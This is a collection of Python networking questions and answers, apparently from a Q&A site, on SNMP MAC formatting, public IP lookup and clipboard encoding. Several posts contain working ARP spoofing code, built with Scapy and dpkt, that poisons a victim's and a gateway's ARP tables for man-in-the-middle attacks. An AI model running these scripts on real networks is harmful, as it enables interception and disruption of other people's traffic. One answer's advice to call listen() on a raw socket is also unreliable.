Hey Im trying to get the MAC-address via ipNetToMediaPhysAddress which works fine when using the netsnmp.snmpget command but when saving that into a variable(tuple?) and printing it out via "print" the mac-address looks like this.
('\x00\n\xb7\x9c\x93\x80',)
Code looks like this,
mac = netsnmp.Varbind("ipNetToMediaPhysAddress."+i+"."+ipadd)
macadd = netsnmp.snmpget(mac, Version = 2, DestHost = ip, Community = comm)
print '%-15s' % macadd
So what do I need to do? I just want it to look like a normal MAC address.
Maybe a call to hexlify is enough
from binascii import hexlify
mac = netsnmp.Varbind("ipNetToMediaPhysAddress."+i+"."+ipadd)
macadd = netsnmp.snmpget(mac, Version = 2, DestHost = ip, Community = comm)
print hexlify(macadd[0])
Related
I've lately been trying to build a "Man in The Middle" using Python and Scapy (for my own practice, no malicious purposes).
I started off with writing code to create a dos, however for some reason it's acting strangely.
First of all, for some reason, when I run it on my Windows PC, the arp entry never changes. I've even gone as far as clearing the arp table (arp -d *), yet still the real mac address of the gateway returns.
Secondly, the code seems to work on my phone only partially - when opening websites, it just takes a long while. Also some websites seem unaffected (Instagram works...).
Also, running the code against different brands of phones resulted in different results.
Could it be that there are security measures on the different devices? Did I do something wrong?
Here is the code, thanks for the help!
from enum import Enum
import getmac
import netifaces
from scapy.all import ARP, Ether, sendp
class DeviceIps(Enum):
MyPhone = '192.168.1.27'
MyPc = '192.168.1.70'
class Device(object):
def __init__(self, ip: str):
self.ip = ip
def get_mac_from_ip(ip=None):
return getmac.get_mac_address(ip=ip)
def build_poison_packet(victim_ip):
ARP_RESPONSE_CODE = 0x2
FAKE_MAC_ADDRESS = 'aa:bb:cc:dd:ee:ff'
gateway_ip_address = netifaces.gateways()['default'][netifaces.AF_INET][0]
victim_mac_address = get_mac_from_ip(victim_ip)
poison_packet = Ether(src=FAKE_MAC_ADDRESS, dst=victim_mac_address) \
/ ARP(psrc=gateway_ip_address, # -> Address to lie about
hwsrc=FAKE_MAC_ADDRESS, # -> Mac address to direct to
hwdst=victim_mac_address, pdst=victim_ip, op=ARP_RESPONSE_CODE)
return poison_packet
def poison(target: Device):
poison_packet = build_poison_packet(target.ip)
print(poison_packet.show())
while True:
sendp(poison_packet)
def main():
poison(Device(DeviceIps.MyPc.value))
main()
Here's simple scapy code that send arp reply to victim and host (gateway) address.
You can clean up the both victim and host arp table before your script is terminated.
#!/bin/env python
from scapy.all import Ether, ARP, sendp
import time
victim_hw_addr = "34:e1:2d:83:20:aa"
victim_ip_addr = "192.168.43.152"
gw_hw_addr = "ce:9f:7a:7b:d7:aa"
gw_ip_addr = "192.168.43.1"
my_hw_addr = "8c:85:90:c3:0b:aa"
tmout = 100
arp4victim = Ether(dst=victim_hw_addr, src=my_hw_addr) / ARP(pdst=victim_ip_addr, hwdst=victim_hw_addr, psrc=gw_ip_addr, hwsrc=my_hw_addr, op=2)
arp4gw = Ether(dst=gw_hw_addr, src=my_hw_addr) / ARP(pdst=gw_ip_addr, hwdst=gw_hw_addr, psrc=victim_ip_addr, hwsrc=my_hw_addr, op=2)
while True:
sendp(arp4victim)
sendp(arp4gw)
time.sleep(3)
print "*"
I have an issue that exists only on the MacOs. It works fine on Windows.
I am using python3.
Here is the code:
# coding=utf-8
# using address you inputed to open a web map site
import webbrowser, sys, pyperclip
if len(sys.argv) > 1:
#get address from command line.
address = ' '.join(sys.argv[1:])
else:
#get address from clip board.
address = pyperclip.paste()
webbrowser.open('https://ditu.amap.com/search?query=' + address)
For example:
copy "New York" works.
But when you copy "和卉家园" which is a Chinese address, it will be a mojibake (garbled text),and this problem exists only in MacOs.
I have no idea how to solve it, please help me ,Thank you!
I am trying to read an ARP request with my python script which is on my computer that is running Ubuntu 14.04. Wireshark shows that I AM receiving the ARP requests but I am not able to read it with python. I am not sure if the problem is in my computer or not, but I think that somehow the problem is in my computer and not the script.
I am running this script with sudo python "..../name.py"
This is my python script so far:
import dpkt
import socket
import binascii
import time
def to_Readble(addr):
s=list()
addr=binascii.hexlify(addr)
for i in xrange(12/2):
s.append(addr[i*2:i*2+2])
r=":".join(s)
return r
def to_Sendable(r):
s=r.split(":")
for i in xrange(6):
s[i]=binascii.unhexlify(s[i])
addr=''.join(s)
return addr
def buildARP(src_mac, src_ip, to_mac, to_ip):
arp_p = dpkt.arp.ARP()
arp_p.sha = to_Sendable(src_mac) #add configure
arp_p.spa = socket.inet_aton(src_ip)
arp_p.tha = to_Sendable(to_mac) #add configure
arp_p.tpa = socket.inet_aton(to_ip)
arp_p.op = dpkt.arp.ARP_OP_REPLY #reply
packet = dpkt.ethernet.Ethernet()
packet.src = to_Sendable(src_mac)
packet.dst = to_Sendable(to_mac)
packet.data = arp_p
packet.type = dpkt.ethernet.ETH_TYPE_ARP
return packet
raw_sock=socket.socket(socket.PF_PACKET, socket.SOCK_RAW,socket.htons(0x0003))#changed ver
raw_sock.bind(("eth0", dpkt.ethernet.ETH_TYPE_ARP))
#dns_sock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#dns_sock.bind(('',53))
my_mac=to_Readble(raw_sock.getsockname()[-1])
print my_mac
#my_mac="e0:06:e6:d7:c6:c3"
dif="00:00:00:00:00:00"
dif1="ff:ff:ff:ff:ff:ff"
rout="192.168.122.1"
ip_macs={}
print "running"
while 1:
for i in ip_macs.keys():#sending stuff
raw_sock.send(str(buildARP(my_mac,rout,ip_macs[i],i)))
try:
# raw_sock.recv(1024) Blocks the script!!!!***!!!
data = raw_sock.recv(1024)
print "got arp"
...
Someone has an Idea for why I am not getting the requests?
You need socket.listen() after the socket.bind().
Rather that repeat other answers, see this So Answer:
(Very) basic Python client socket example
I am trying to update my rackspace dns with my IP using a python script.
My script works when I manually enter an IP in it, but dosen't when I get it from the outside, why?
This WORKS:
#!/usr/bin/env python
import clouddns
import requests
r= requests.get(r'http://curlmyip.com/')
ip= '4.4.4.4'
dns = clouddns.connection.Connection('******','********************')
domain = dns.get_domain(name='reazem.net')
record = domain.get_record(name='ssh.reazem.net')
record.update(data=ip, ttl=600)
This DOESN'T:
#!/usr/bin/env python
import clouddns
import requests
r= requests.get(r'http://curlmyip.com/')
**ip= '{}'.format(r.text)**
dns = clouddns.connection.Connection('******','********************')
domain = dns.get_domain(name='reazem.net')
record = domain.get_record(name='ssh.reazem.net')
record.update(data=ip, ttl=600)
Note: print '{}'.format(r.text) succesfully outputs my ip.
Helping you helping me: I just noticed that print '{}'.format(r.text) adds an extra line, how do I avoid that?
For those interested: https://github.com/rackspace/python-clouddns
Try ip = r.text.strip() to remove the extra newline.
How can I find the public facing IP for my net work in Python?
This will fetch your remote IP address
import urllib
ip = urllib.urlopen('http://automation.whatismyip.com/n09230945.asp').read()
If you don't want to rely on someone else, then just upload something like this PHP script:
<?php echo $_SERVER['REMOTE_ADDR']; ?>
and change the URL in the Python or if you prefer ASP:
<%
Dim UserIPAddress
UserIPAddress = Request.ServerVariables("REMOTE_ADDR")
%>
Note: I don't know ASP, but I figured it might be useful to have here so I googled.
https://api.ipify.org/?format=json is pretty straight forward
can be parsed by just running requests.get("https://api.ipify.org/?format=json").json()['ip']
whatismyip.org is better... it just tosses back the ip as plaintext with no extraneous crap.
import urllib
ip = urllib.urlopen('http://whatismyip.org').read()
But yeah, it's impossible to do it easily without relying on something outside the network itself.
import requests
r = requests.get(r'http://jsonip.com')
# r = requests.get(r'https://ifconfig.co/json')
ip= r.json()['ip']
print('Your IP is {}'.format(ip))
Reference
If you don't mind expletives then try:
http://wtfismyip.com/json
Bind it up in the usual urllib stuff as others have shown.
There's also:
http://www.networksecuritytoolkit.org/nst/tools/ip.php
import urllib2
text = urllib2.urlopen('http://www.whatismyip.org').read()
urlRE=re.findall('[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}',text)
urlRE
['146.148.123.123']
Try putting whatever 'findmyipsite' you can find into a list and iterating through them for comparison. This one seems to work well.
This is simple as
>>> import urllib
>>> urllib.urlopen('http://icanhazip.com/').read().strip('\n')
'xx.xx.xx.xx'
You can also use DNS which in some cases may be more reliable than http methods:
#!/usr/bin/env python3
# pip install --user dnspython
import dns.resolver
resolver1_opendns_ip = False
resolver = dns.resolver.Resolver()
opendns_result = resolver.resolve("resolver1.opendns.com", "A")
for record in opendns_result:
resolver1_opendns_ip = record.to_text()
if resolver1_opendns_ip:
resolver.nameservers = [resolver1_opendns_ip]
myip_result = resolver.resolve("myip.opendns.com", "A")
for record in myip_result:
print(f"Your external ip is {record.to_text()}")
This is the python equivalent of dig +short -4 myip.opendns.com #resolver1.opendns.com